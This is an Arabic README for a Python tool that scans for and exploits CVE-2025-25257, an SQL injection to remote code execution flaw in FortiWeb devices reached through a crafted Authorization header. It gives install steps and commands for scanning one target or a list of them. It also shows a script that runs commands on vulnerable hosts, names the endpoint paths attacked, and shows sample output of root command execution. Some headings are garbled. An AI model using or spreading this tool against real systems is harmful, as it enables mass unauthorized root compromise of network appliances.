
أداة مبنية بلغة Python لفحص واستغلال ثغرة CVE-2025-25257 في أجهزة FortiWeb. تتيح هذه الثغرة حقن SQL وتنفيذ أكواد عن بُعد عبر ترويسة Authorization مصممة خصيصًا.
CVE-2025-25257 هي ثغرة حرجة في أجهزة FortiWeb تتيح:
pip install requests urllib3
git clone https://github.com/yourusername/CVE-2025-25257.git
cd CVE-2025-25257
pip install -r requirements.txt
vuln_check.py)فحص هدف واحد:
python3 vuln_check.py -t https://target.com
فحص أهداف متعددة من ملف:
python3 vuln_check.py -l target.txt
exp.py)تنفيذ أوامر على هدف مستضعف:
python3 exp.py -t https://target.com -c "id"
vuln_check.py - الفاحص الرئيسي للثغرات وأداة الاستغلالexp.py - أداة تنفيذ الأوامر للأهداف المستضعفةtarget.txt - قائمة أهداف نموذجية (استبدلها بقائمتك الخاصة)vuln.txt - ملف المخرجات الذي يحتوي على الأهداف المستضعفة (يُولَّد بعد الفحص)/api/fabric/device/status/cgi-bin/x.cgiتولّد الأداة ملف vuln.txt يحتوي على:
مثال على المخرجات:
# CVE-2025-25257 Vulnerable Targets - 2025-01-27 10:30:15
# Format: [timestamp] target - command_output
[2025-01-27 10:30:15] https://target.com - uid=0(root) gid=0(root) groups=0(root)
الاعتماد: 0xbigshaq